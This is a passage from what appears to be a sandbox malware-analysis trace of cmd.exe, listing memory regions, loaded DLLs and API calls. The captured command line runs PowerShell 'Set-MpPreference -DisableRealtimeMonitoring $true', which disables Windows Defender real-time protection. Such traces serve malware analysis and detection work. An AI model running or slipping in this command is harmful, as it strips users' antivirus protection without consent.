"pagefile_0x0000000000010000" filename = "" Region: id = 2681 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2682 start_va = 0x110000 end_va = 0x176fff entry_point = 0x110000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2683 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2684 start_va = 0x75280000 end_va = 0x75286fff entry_point = 0x75280000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 2685 start_va = 0x75310000 end_va = 0x7531bfff entry_point = 0x75310000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2686 start_va = 0x75320000 end_va = 0x7537ffff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2687 start_va = 0x75390000 end_va = 0x7542ffff entry_point = 0x75390000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2688 start_va = 0x75510000 end_va = 0x75519fff entry_point = 0x75510000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2689 start_va = 0x755d0000 end_va = 0x7565ffff entry_point = 0x755d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2690 start_va = 0x758f0000 end_va = 0x759dffff entry_point = 0x758f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2691 start_va = 0x759f0000 end_va = 0x75a08fff entry_point = 0x759f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2692 start_va = 0x75b60000 end_va = 0x75bfcfff entry_point = 0x75b60000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2693 start_va = 0x75c00000 end_va = 0x75cabfff entry_point = 0x75c00000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2694 start_va = 0x76110000 end_va = 0x76155fff entry_point = 0x76110000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2695 start_va = 0x76380000 end_va = 0x7647ffff entry_point = 0x76380000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2696 start_va = 0x76540000 end_va = 0x7664ffff entry_point = 0x76540000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2697 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 2698 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x0 region_type = private name = "private_0x00000000774e0000" filename = "" Region: id = 2699 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2700 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2701 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 2702 start_va = 0x500000 end_va = 0x687fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2703 start_va = 0x75430000 end_va = 0x754fbfff entry_point = 0x75430000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2704 start_va = 0x75cb0000 end_va = 0x75d0ffff entry_point = 0x75cb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2705 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2706 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2707 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 2708 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2709 start_va = 0x690000 end_va = 0x810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 2710 start_va = 0x820000 end_va = 0x1c1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 2711 start_va = 0x1c20000 end_va = 0x1f62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c20000" filename = "" Region: id = 2745 start_va = 0x1f70000 end_va = 0x223efff entry_point = 0x1f70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 153 os_tid = 0x6a4 [0128.733] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3dfc5c | out: lpSystemTimeAsFileTime=0x3dfc5c*(dwLowDateTime=0xef39fad0, dwHighDateTime=0x1d4be3a)) [0128.733] GetCurrentProcessId () returned 0x318 [0128.733] GetCurrentThreadId () returned 0x6a4 [0128.733] GetTickCount () returned 0x2caad [0128.733] QueryPerformanceCounter (in: lpPerformanceCount=0x3dfc54 | out: lpPerformanceCount=0x3dfc54*=1820610500000) returned 1 [0128.734] GetModuleHandleA (lpModuleName=0x0) returned 0x4a550000 [0128.734] __set_app_type (_Type=0x1) [0128.734] __p__fmode () returned 0x75ca31f4 [0128.734] __p__commode () returned 0x75ca31fc [0128.735] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5721a6) returned 0x0 [0128.735] __getmainargs (in: _Argc=0x4a574238, _Argv=0x4a574240, _Env=0x4a57423c, _DoWildCard=0, _StartInfo=0x4a574140 | out: _Argc=0x4a574238, _Argv=0x4a574240, _Env=0x4a57423c) returned 0 [0128.735] GetCurrentThreadId () returned 0x6a4 [0128.735] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x6a4) returned 0x60 [0128.735] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76540000 [0128.735] GetProcAddress (hModule=0x76540000, lpProcName="SetThreadUILanguage") returned 0x7656a84f [0128.735] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.735] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.736] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3dfbec | out: phkResult=0x3dfbec*=0x0) returned 0x2 [0128.736] VirtualQuery (in: lpAddress=0x3dfc23, lpBuffer=0x3dfbbc, dwLength=0x1c | out: lpBuffer=0x3dfbbc*(BaseAddress=0x3df000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.736] VirtualQuery (in: lpAddress=0x2e0000, lpBuffer=0x3dfbbc, dwLength=0x1c | out: lpBuffer=0x3dfbbc*(BaseAddress=0x2e0000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0128.736] VirtualQuery (in: lpAddress=0x2e1000, lpBuffer=0x3dfbbc, dwLength=0x1c | out: lpBuffer=0x3dfbbc*(BaseAddress=0x2e1000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0128.736] VirtualQuery (in: lpAddress=0x2e3000, lpBuffer=0x3dfbbc, dwLength=0x1c | out: lpBuffer=0x3dfbbc*(BaseAddress=0x2e3000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.736] VirtualQuery (in: lpAddress=0x3e0000, lpBuffer=0x3dfbbc, dwLength=0x1c | out: lpBuffer=0x3dfbbc*(BaseAddress=0x3e0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x20000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0128.736] GetConsoleOutputCP () returned 0x1b5 [0128.736] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a574260 | out: lpCPInfo=0x4a574260) returned 1 [0128.736] SetConsoleCtrlHandler (HandlerRoutine=0x4a56e72a, Add=1) returned 1 [0128.736] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.736] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0128.736] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.736] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5741ac | out: lpMode=0x4a5741ac) returned 1 [0128.737] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.737] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0128.737] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.737] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5741b0 | out: lpMode=0x4a5741b0) returned 1 [0128.737] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.737] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0128.737] GetEnvironmentStringsW () returned 0x411fc8* [0128.738] FreeEnvironmentStringsW (penv=0x411fc8) returned 1 [0128.738] GetEnvironmentStringsW () returned 0x411fc8* [0128.738] FreeEnvironmentStringsW (penv=0x411fc8) returned 1 [0128.738] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3deb5c | out: phkResult=0x3deb5c*=0x68) returned 0x0 [0128.738] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3deb64, lpData=0x3deb68, lpcbData=0x3deb60*=0x1000 | out: lpType=0x3deb64*=0x0, lpData=0x3deb68*=0x0, lpcbData=0x3deb60*=0x1000) returned 0x2 [0128.738] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3deb64, lpData=0x3deb68, lpcbData=0x3deb60*=0x1000 | out: lpType=0x3deb64*=0x4, lpData=0x3deb68*=0x1, lpcbData=0x3deb60*=0x4) returned 0x0 [0128.738] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3deb64, lpData=0x3deb68, lpcbData=0x3deb60*=0x1000 | out: lpType=0x3deb64*=0x0, lpData=0x3deb68*=0x1, lpcbData=0x3deb60*=0x1000) returned 0x2 [0128.738] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3deb64, lpData=0x3deb68, lpcbData=0x3deb60*=0x1000 | out: lpType=0x3deb64*=0x4, lpData=0x3deb68*=0x0, lpcbData=0x3deb60*=0x4) returned 0x0 [0128.738] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3deb64, lpData=0x3deb68, lpcbData=0x3deb60*=0x1000 | out: lpType=0x3deb64*=0x4, lpData=0x3deb68*=0x40, lpcbData=0x3deb60*=0x4) returned 0x0 [0128.738] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3deb64, lpData=0x3deb68, lpcbData=0x3deb60*=0x1000 | out: lpType=0x3deb64*=0x4, lpData=0x3deb68*=0x40, lpcbData=0x3deb60*=0x4) returned 0x0 [0128.738] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3deb64, lpData=0x3deb68, lpcbData=0x3deb60*=0x1000 | out: lpType=0x3deb64*=0x0, lpData=0x3deb68*=0x40, lpcbData=0x3deb60*=0x1000) returned 0x2 [0128.738] RegCloseKey (hKey=0x68) returned 0x0 [0128.738] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3deb5c | out: phkResult=0x3deb5c*=0x68) returned 0x0 [0128.739] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3deb64, lpData=0x3deb68, lpcbData=0x3deb60*=0x1000 | out: lpType=0x3deb64*=0x0, lpData=0x3deb68*=0x40, lpcbData=0x3deb60*=0x1000) returned 0x2 [0128.739] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3deb64, lpData=0x3deb68, lpcbData=0x3deb60*=0x1000 | out: lpType=0x3deb64*=0x4, lpData=0x3deb68*=0x1, lpcbData=0x3deb60*=0x4) returned 0x0 [0128.739] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3deb64, lpData=0x3deb68, lpcbData=0x3deb60*=0x1000 | out: lpType=0x3deb64*=0x0, lpData=0x3deb68*=0x1, lpcbData=0x3deb60*=0x1000) returned 0x2 [0128.739] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3deb64, lpData=0x3deb68, lpcbData=0x3deb60*=0x1000 | out: lpType=0x3deb64*=0x4, lpData=0x3deb68*=0x0, lpcbData=0x3deb60*=0x4) returned 0x0 [0128.739] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3deb64, lpData=0x3deb68, lpcbData=0x3deb60*=0x1000 | out: lpType=0x3deb64*=0x4, lpData=0x3deb68*=0x9, lpcbData=0x3deb60*=0x4) returned 0x0 [0128.739] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3deb64, lpData=0x3deb68, lpcbData=0x3deb60*=0x1000 | out: lpType=0x3deb64*=0x4, lpData=0x3deb68*=0x9, lpcbData=0x3deb60*=0x4) returned 0x0 [0128.739] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3deb64, lpData=0x3deb68, lpcbData=0x3deb60*=0x1000 | out: lpType=0x3deb64*=0x0, lpData=0x3deb68*=0x9, lpcbData=0x3deb60*=0x1000) returned 0x2 [0128.739] RegCloseKey (hKey=0x68) returned 0x0 [0128.739] time (in: timer=0x0 | out: timer=0x0) returned 0x5c5b0e6f [0128.739] srand (_Seed=0x5c5b0e6f) [0128.739] GetCommandLineW () returned="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" [0128.739] GetCommandLineW () returned="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" [0128.739] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a575260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.740] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x411fd0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0128.740] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.740] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.740] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.740] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0128.740] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0128.740] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0128.740] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0128.740] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0128.740] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0128.740] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0128.740] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0128.740] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0128.740] GetEnvironmentStringsW () returned 0x4121e0* [0128.741] FreeEnvironmentStringsW (penv=0x4121e0) returned 1 [0128.741] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.741] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.741] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0128.821] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0128.821] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0128.821] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0128.821] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0128.821] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0128.821] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0128.821] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0128.821] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3df928 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x3df928, lpFilePart=0x3df924 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x3df924*="system32") returned 0x13 [0128.821] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0128.821] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x3df6a4 | out: lpFindFileData=0x3df6a4) returned 0x4007f0 [0128.821] FindClose (in: hFindFile=0x4007f0 | out: hFindFile=0x4007f0) returned 1 [0128.821] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x3df6a4 | out: lpFindFileData=0x3df6a4) returned 0x4007f0 [0128.822] FindClose (in: hFindFile=0x4007f0 | out: hFindFile=0x4007f0) returned 1 [0128.822] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0128.822] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0128.822] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0128.822] GetEnvironmentStringsW () returned 0x4121e0* [0128.822] FreeEnvironmentStringsW (penv=0x4121e0) returned 1 [0128.822] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a575260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.823] GetConsoleOutputCP () returned 0x1b5 [0128.823] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a574260 | out: lpCPInfo=0x4a574260) returned 1 [0128.823] GetUserDefaultLCID () returned 0x409 [0128.823] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a574950, cchData=8 | out: lpLCData=":") returned 2 [0128.823] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3dfa68, cchData=128 | out: lpLCData="0") returned 2 [0128.823] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3dfa68, cchData=128 | out: lpLCData="0") returned 2 [0128.823] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3dfa68, cchData=128 | out: lpLCData="1") returned 2 [0128.823] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a574940, cchData=8 | out: lpLCData="/") returned 2 [0128.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a574d80, cchData=32 | out: lpLCData="Mon") returned 4 [0128.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a574d40, cchData=32 | out: lpLCData="Tue") returned 4 [0128.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a574d00, cchData=32 | out: lpLCData="Wed") returned 4 [0128.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a574cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0128.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a574c80, cchData=32 | out: lpLCData="Fri") returned 4 [0128.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a574c40, cchData=32 | out: lpLCData="Sat") returned 4 [0128.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a574c00, cchData=32 | out: lpLCData="Sun") returned 4 [0128.824] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a574930, cchData=8 | out: lpLCData=".") returned 2 [0128.824] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a574920, cchData=8 | out: lpLCData=",") returned 2 [0128.824] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0128.825] GetConsoleTitleW (in: lpConsoleTitle=0x414a70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.825] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76540000 [0128.825] GetProcAddress (hModule=0x76540000, lpProcName="CopyFileExW") returned 0x76573b92 [0128.825] GetProcAddress (hModule=0x76540000, lpProcName="IsDebuggerPresent") returned 0x76554a5d [0128.825] GetProcAddress (hModule=0x76540000, lpProcName="SetConsoleInputExeNameW") returned 0x7656a79d [0128.826] _wcsicmp (_String1="powershell", _String2=")") returned 71 [0128.827] _wcsicmp (_String1="FOR", _String2="powershell") returned -10 [0128.827] _wcsicmp (_String1="FOR/?", _String2="powershell") returned -10 [0128.827] _wcsicmp (_String1="IF", _String2="powershell") returned -7 [0128.827] _wcsicmp (_String1="IF/?", _String2="powershell") returned -7 [0128.827] _wcsicmp (_String1="REM", _String2="powershell") returned 2 [0128.827] _wcsicmp (_String1="REM/?", _String2="powershell") returned 2 [0128.828] GetConsoleTitleW (in: lpConsoleTitle=0x3df760, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.829] _wcsicmp (_String1="powershell", _String2="DIR") returned 12 [0128.829] _wcsicmp (_String1="powershell", _String2="ERASE") returned 11 [0128.829] _wcsicmp (_String1="powershell", _String2="DEL") returned 12 [0128.829] _wcsicmp (_String1="powershell", _String2="TYPE") returned -4 [0128.829] _wcsicmp (_String1="powershell", _String2="COPY") returned 13 [0128.829] _wcsicmp (_String1="powershell", _String2="CD") returned 13 [0128.829] _wcsicmp (_String1="powershell", _String2="CHDIR") returned 13 [0128.829] _wcsicmp (_String1="powershell", _String2="RENAME") returned -2 [0128.829] _wcsicmp (_String1="powershell", _String2="REN") returned -2 [0128.829] _wcsicmp (_String1="powershell", _String2="ECHO") returned 11 [0128.829] _wcsicmp (_String1="powershell", _String2="SET") returned -3 [0128.829] _wcsicmp (_String1="powershell", _String2="PAUSE") returned 14 [0128.829] _wcsicmp (_String1="powershell", _String2="DATE") returned 12 [0128.829] _wcsicmp (_String1="powershell", _String2="TIME") returned -4 [0128.829] _wcsicmp (_String1="powershell", _String2="PROMPT") returned -3 [0128.829] _wcsicmp (_String1="powershell", _String2="MD") returned 3 [0128.829] _wcsicmp (_String1="powershell", _String2="MKDIR") returned 3 [0128.829] _wcsicmp (_String1="powershell", _String2="RD") returned -2 [0128.829] _wcsicmp (_String1="powershell", _String2="RMDIR") returned -2 [0128.829] _wcsicmp (_String1="powershell", _String2="PATH") returned 14 [0128.830] _wcsicmp (_String1="powershell", _String2="GOTO") returned 9 [0128.830] _wcsicmp (_String1="powershell", _String2="SHIFT") returned -3 [0128.830] _wcsicmp (_String1="powershell", _String2="CLS") returned 13 [0128.830] _wcsicmp (_String1="powershell", _String2="CALL") returned 13 [0128.830] _wcsicmp (_String1="powershell", _String2="VERIFY") returned -6 [0128.830] _wcsicmp (_String1="powershell", _String2="VER") returned -6 [0128.830] _wcsicmp (_String1="powershell", _String2="VOL") returned -6 [0128.830] _wcsicmp (_String1="powershell", _String2="EXIT") returned 11 [0128.830] _wcsicmp (_String1="powershell", _String2="SETLOCAL") returned -3 [0128.830] _wcsicmp (_String1="powershell", _String2="ENDLOCAL") returned 11 [0128.830] _wcsicmp (_String1="powershell", _String2="TITLE") returned -4 [0128.830] _wcsicmp (_String1="powershell", _String2="START") returned -3 [0128.830] _wcsicmp (_String1="powershell", _String2="DPATH") returned 12 [0128.830] _wcsicmp (_String1="powershell", _String2="KEYS") returned 5 [0128.830] _wcsicmp (_String1="powershell", _String2="MOVE") returned 3 [0128.830] _wcsicmp (_String1="powershell", _String2="PUSHD") returned -6 [0128.830] _wcsicmp (_String1="powershell", _String2="POPD") returned 7 [0128.830] _wcsicmp (_String1="powershell", _String2="ASSOC") returned 15 [0128.830] _wcsicmp (_String1="powershell", _String2="FTYPE") returned 10 [0128.830] _wcsicmp (_String1="powershell", _String2="BREAK") returned 14 [0128.830] _wcsicmp (_String1="powershell", _String2="COLOR") returned 13 [0128.830] _wcsicmp (_String1="powershell", _String2="MKLINK") returned 3 [0128.830] _wcsicmp (_String1="powershell", _String2="DIR") returned 12 [0128.830] _wcsicmp (_String1="powershell", _String2="ERASE") returned 11 [0128.830] _wcsicmp (_String1="powershell", _String2="DEL") returned 12 [0128.830] _wcsicmp (_String1="powershell", _String2="TYPE") returned -4 [0128.830] _wcsicmp (_String1="powershell", _String2="COPY") returned 13 [0128.830] _wcsicmp (_String1="powershell", _String2="CD") returned 13 [0128.830] _wcsicmp (_String1="powershell", _String2="CHDIR") returned 13 [0128.830] _wcsicmp (_String1="powershell", _String2="RENAME") returned -2 [0128.830] _wcsicmp (_String1="powershell", _String2="REN") returned -2 [0128.830] _wcsicmp (_String1="powershell", _String2="ECHO") returned 11 [0128.831] _wcsicmp (_String1="powershell", _String2="SET") returned -3 [0128.831] _wcsicmp (_String1="powershell", _String2="PAUSE") returned 14 [0128.831] _wcsicmp (_String1="powershell", _String2="DATE") returned 12 [0128.831] _wcsicmp (_String1="powershell", _String2="TIME") returned -4 [0128.831] _wcsicmp (_String1="powershell", _String2="PROMPT") returned -3 [0128.831] _wcsicmp (_String1="powershell", _String2="MD") returned 3 [0128.831] _wcsicmp (_String1="powershell", _String2="MKDIR") returned 3 [0128.831] _wcsicmp (_String1="powershell", _String2="RD") returned -2 [0128.831] _wcsicmp (_String1="powershell", _String2="RMDIR") returned -2 [0128.831] _wcsicmp (_String1="powershell", _String2="PATH") returned 14 [0128.831] _wcsicmp (_String1="powershell", _String2="GOTO") returned 9 [0128.831] _wcsicmp (_String1="powershell", _String2="SHIFT") returned -3 [0128.831] _wcsicmp (_String1="powershell", _String2="CLS") returned 13 [0128.831] _wcsicmp (_String1="powershell", _String2="CALL") returned 13 [0128.831] _wcsicmp (_String1="powershell", _String2="VERIFY") returned -6 [0128.831] _wcsicmp (_String1="powershell", _String2="VER") returned -6 [0128.831] _wcsicmp (_String1="powershell", _String2="VOL") returned -6 [0128.831] _wcsicmp (_String1="powershell", _String2="EXIT") returned 11 [0128.831] _wcsicmp (_String1="powershell", _String2="SETLOCAL") returned -3 [0128.831] _wcsicmp (_String1="powershell", _String2="ENDLOCAL") returned 11 [0128.831] _wcsicmp (_String1="powershell", _String2="TITLE") returned -4 [0128.831] _wcsicmp (_String1="powershell", _String2="START") returned -3 [0128.831] _wcsicmp (_String1="powershell", _String2="DPATH") returned 12 [0128.831] _wcsicmp (_String1="powershell", _String2="KEYS") returned 5 [0128.831] _wcsicmp (_String1="powershell", _String2="MOVE") returned 3 [0128.831] _wcsicmp (_String1="powershell", _String2="PUSHD") returned -6 [0128.831] _wcsicmp (_String1="powershell", _String2="POPD") returned 7 [0128.831] _wcsicmp (_String1="powershell", _String2="ASSOC") returned 15 [0128.831] _wcsicmp (_String1="powershell", _String2="FTYPE") returned 10 [0128.831] 